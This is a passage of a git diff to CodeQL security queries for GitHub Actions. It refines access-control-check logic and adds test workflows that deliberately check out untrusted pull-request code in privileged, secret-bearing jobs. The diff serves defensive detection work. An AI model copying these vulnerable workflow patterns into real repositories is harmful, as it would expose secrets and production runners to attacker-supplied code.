} } abstract class RepositoryCheck extends ControlCheck { - // repository checks are effective against pull requests since they can control where the code is coming from - // they are not effective against issue_comment since the repository will always be the same - // who you are (identity) - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - override boolean protectsAgainstRefMutationAttacks() { result = true } + // checks that the origin of the code is the same as the repository. + // for pull_requests, that means that it triggers only on local branches or repos from the same org + // - they are effective against pull requests/workflow_run since they can control where the code is coming from + // - they are not effective against issue_comment since the repository will always be the same + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + } } abstract class PermissionCheck extends ControlCheck { - // permission checks are effective against pull requests since they can control who can make changes - // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR - // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval - // who you are (identity) - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - override boolean protectsAgainstRefMutationAttacks() { result = true } + // checks that the actor has a specific permission level + // - they are effective against pull requests/workflow_run since they can control who can make changes + // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run", "issue_comment"] and + category = any_relevant_category() + } } abstract class LabelCheck extends ControlCheck { - // does it protect injection attacks but not pwn requests? - // pwn requests are susceptible to checkout of mutable code - // but injection attacks are not, although a branch name can be changed after approval and perhaps also some other things - // they do actually protext against untrusted code execution (sha) - // what you have (approval) - // TODO: A check should be a combination of: - // - event type (pull_request, issue_comment, etc) - // - category (untrusted mutable code, untrusted immutable code, code injection, etc) - // - we dont know this unless we pass category to inPrivilegedContext and into ControlCheck.protects - // - we can decide if a control check is effective based only on the ast node - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - // ref can be mutated after approval - override boolean protectsAgainstRefMutationAttacks() { result = false } + // checks if the issue/pull_request is labeled, which implies that it could have been approved + // - they dont protect against mutation attacks + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category() + } } class EnvironmentCheck extends ControlCheck instanceof Environment { // Environment checks are not effective against any mutable attacks - // they do actually protext against untrusted code execution (sha) - // what you have (approval) - EnvironmentCheck() { any() } + // they do actually protect against untrusted code execution (sha) + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category() + } +} - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - // ref can be mutated after approval - override boolean protectsAgainstRefMutationAttacks() { result = false } +abstract class CommentVsHeadDateCheck extends ControlCheck { + override predicate protectsCategoryAndEvent(string category, string event) { + // by itself, this check is not effective against any attacks + none() + } } /* Specific implementations of control checks */ @@ -184,6 +204,12 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { class PermissionActionCheck extends PermissionCheck instanceof UsesStep { PermissionActionCheck() { + this.getCallee() = "sushichop/action-repository-permission" and + this.getArgument("required-permission") = ["write", "admin"] + or + this.getCallee() = "prince-chrismc/check-actor-permissions-action" and + this.getArgument("permission") = ["write", "admin"] + or this.getCallee() = "lannonbr/repo-permission-check-action" and this.getArgument("permission") = ["write", "admin"] or @@ -195,3 +221,13 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep { ) } } + +class BashCommentVsHeadDateCheck extends CommentVsHeadDateCheck, Run { + BashCommentVsHeadDateCheck() { + exists(string line | + line = this.getScript().splitAt("\n") and + line.toLowerCase() + .regexpMatch(".*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*") + ) + } +} diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml index 88d17c728b7..028671c243d 100644 --- a/ql/lib/ext/config/externally_triggereable_events.yml +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -6,13 +6,14 @@ extensions: - ["discussion"] - ["discussion_comment"] - ["fork"] + - ["watch"] - ["issue_comment"] - ["issues"] - - ["pull_request"] + - ["pull_request"] # non-privileged - ["pull_request_comment"] - ["pull_request_review"] - ["pull_request_review_comment"] - ["pull_request_target"] - - ["workflow_run"] # depending on trigger workflow + - ["workflow_run"] # depending on branch filter - ["workflow_call"] # depending on caller diff --git a/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql index c53489f9628..0ead5aa7689 100644 --- a/ql/src/Security/CWE-074/OutputClobberingHigh.ql +++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql @@ -16,6 +16,7 @@ import actions import codeql.actions.security.OutputClobberingQuery import codeql.actions.dataflow.ExternalFlow import OutputClobberingFlow::PathGraph +import codeql.actions.security.ControlChecks from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink where @@ -23,9 +24,20 @@ where inPrivilegedContext(sink.getNode().asExpr()) and // exclude paths to file read sinks from non-artifact sources ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), + ["untrusted-checkout", "artifact-poisoning"]) + ) and ( sink.getNode() instanceof OutputClobberingFromFileReadSink or sink.getNode() instanceof WorkflowCommandClobberingFromFileReadSink or diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 4ff86eb0fbd..9fa066d195c 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -15,15 +15,27 @@ import actions import codeql.actions.security.EnvPathInjectionQuery import EnvPathInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr()) and ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), + ["untrusted-checkout", "artifact-poisoning"]) + ) and sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 89e1ddd3cc2..806bae2a91d 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -16,16 +16,33 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import codeql.actions.dataflow.ExternalFlow import EnvVarInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr()) and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "envvar-injection") + ) and // exclude paths to file read sinks from non-artifact sources ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), + ["untrusted-checkout", "artifact-poisoning"]) + ) and ( sink.getNode() instanceof EnvVarInjectionFromFileReadSink or madSink(sink.getNode(), "envvar-injection") diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index affa372f14e..6f1f6008a06 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -14,11 +14,17 @@ import actions import codeql.actions.security.ArgumentInjectionQuery import ArgumentInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink where ArgumentInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) + inPrivilegedContext(sink.getNode().asExpr()) and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "argument-injection") + ) select sink.getNode(), source, sink, "Potential argument injection in $@ command, which may be controlled by an external user.", sink, sink.getNode().(ArgumentInjectionSink).getCommand() diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index 9319718b7fc..ec4925d24a0 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -17,11 +17,17 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr()) and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + ) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | script.getCallee() = "actions/github-script" and diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index 685bdcca401..67b615d115a 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -26,7 +26,9 @@ where // job can be triggered by an external user e.isExternallyTriggerable() and // the checkout is not controlled by an access check - not exists(ControlCheck check | check.protects(source.getNode().asExpr(), j.getATriggerEvent())) and + not exists(ControlCheck check | + check.protects(source.getNode().asExpr(), j.getATriggerEvent(), "code-injection") + ) and // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() and ( diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index ea36bcf0be1..b6df022329d 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql @@ -57,7 +57,9 @@ where path = source.(UntrustedArtifactDownloadStep).getPath() ) and // the checkout/download is not controlled by an access check - not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and + not exists(ControlCheck check | + check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + ) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql index ee2719f0611..0750a02930e 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql @@ -34,7 +34,9 @@ where path = source.(UntrustedArtifactDownloadStep).getPath() ) and // the checkout/download is not controlled by an access check - not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and + not exists(ControlCheck check | + check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + ) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index a97309ce187..7c7ab15de31 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -24,11 +24,10 @@ where // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context - j.isPrivilegedExternallyTriggerable() and + inPrivilegedContext(checkout) and // the mutable checkout step is protected by an Insufficient access check - check.dominates(checkout) and - check.protects(checkout, j.getATriggerEvent()) and - check.protectsAgainstRefMutationAttacks() = false + check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and + not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") select s, checkout, s, "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 0a83cc54ad6..7f584e00c9a 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -22,11 +22,10 @@ where // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - j.isPrivilegedExternallyTriggerable() and + inPrivilegedContext(checkout) and // the mutable checkout step is protected by an Insufficient access check - check.dominates(checkout) and - check.protects(checkout, j.getATriggerEvent()) and - check.protectsAgainstRefMutationAttacks() = false + check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and + not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") select checkout, "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 2026a784d05..499abc047b6 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -20,10 +20,33 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from PRHeadCheckoutStep checkout, PoisonableStep s +from PRHeadCheckoutStep checkout, PoisonableStep step where // the checkout is followed by a known poisonable step - checkout.getAFollowingStep() = s and + checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) -select s, checkout, s, "Execution of untrusted code on a privileged workflow." + inPrivilegedContext(checkout) and + ( + // issue_comment: check for date comparison checks and actor/access control checks + exists(Event event | + event.getName() = "issue_comment" and + event = checkout.getEnclosingJob().getATriggerEvent() and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | + ( + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck + ) and + check.dominates(checkout) and + date_check.dominates(checkout) + ) + ) + or + // not issue_comment triggered workflows + exists(Event event | + not event.getName() = "issue_comment" and + event = checkout.getEnclosingJob().getATriggerEvent() and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) + ) + ) +select step, checkout, step, "Execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 0675603af0f..8577218800e 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -23,5 +23,26 @@ where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) + inPrivilegedContext(checkout) and + ( + // issue_comment: check for date comparison checks and actor/access control checks + exists(Event e | + e.getName() = "issue_comment" and + checkout.getEnclosingJob().getATriggerEvent() = e and + not exists(ControlCheck write_check, CommentVsHeadDateCheck data_check | + (write_check instanceof ActorCheck or write_check instanceof AssociationCheck) and + write_check.dominates(checkout) and + data_check.dominates(checkout) + ) + ) + or + // not issue_comment triggered workflows + exists(Event event | + not event.getName() = "issue_comment" and + not exists(ControlCheck check | + check + .protects(checkout, checkout.getEnclosingJob().getATriggerEvent(), "untrusted-checkout") + ) + ) + ) select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml new file mode 100644 index 00000000000..16bb6bf876c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml @@ -0,0 +1,94 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml new file mode 100644 index 00000000000..878b8377961 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml @@ -0,0 +1,96 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml new file mode 100644 index 00000000000..0a73e86d5fc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml @@ -0,0 +1,31 @@ +on: + issue_comment: + types: + - created +jobs: + danger-for-external: + name: Danger for external - Node.js 16 + if: | + github.event_name == 'issue_comment' && github.event.action == 'created' + && github.event.issue.pull_request != null + && startsWith(github.event.comment.body, '/danger') + runs-on: ubuntu-latest + steps: + - name: Check repository permission for user + uses: sushichop/action-repository-permission@v2 + with: + required-permission: write + reaction-permitted: rocket + comment-not-permitted: Sorry, you don't have enough permission to execute `/danger`... + - name: Clone the PR source + uses: actions/checkout@v3 + with: + ref: refs/pull/${{ github.event.issue.number }}/head + fetch-depth: 0 + - uses: actions/setup-node@v3 + with: + node-version: 16 + - name: Danger JS + run: npx danger ci + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index c91470d5cc8..5d38b397a42 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -27,4 +27,5 @@ | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | +| .github/workflows/test13.yml:14:7:20:4 | Uses Step | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 7313ffd9ae3..8bb9e02559c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -175,6 +175,15 @@ edges | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | +| .github/workflows/test11.yml:30:7:45:4 | Run Step | .github/workflows/test11.yml:45:7:84:4 | Run Step: environment | +| .github/workflows/test11.yml:45:7:84:4 | Run Step: environment | .github/workflows/test11.yml:84:7:90:4 | Uses Step | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | +| .github/workflows/test12.yml:32:7:47:4 | Run Step | .github/workflows/test12.yml:47:7:86:4 | Run Step: environment | +| .github/workflows/test12.yml:47:7:86:4 | Run Step: environment | .github/workflows/test12.yml:86:7:92:4 | Uses Step | +| .github/workflows/test12.yml:86:7:92:4 | Uses Step | .github/workflows/test12.yml:92:7:95:54 | Uses Step | +| .github/workflows/test13.yml:14:7:20:4 | Uses Step | .github/workflows/test13.yml:20:7:25:4 | Uses Step | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | .github/workflows/test13.yml:25:7:28:4 | Uses Step | +| .github/workflows/test13.yml:25:7:28:4 | Uses Step | .github/workflows/test13.yml:28:7:31:50 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -223,7 +232,7 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index b9cf0e547ca..181bd5673bc 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -18,6 +18,7 @@ | 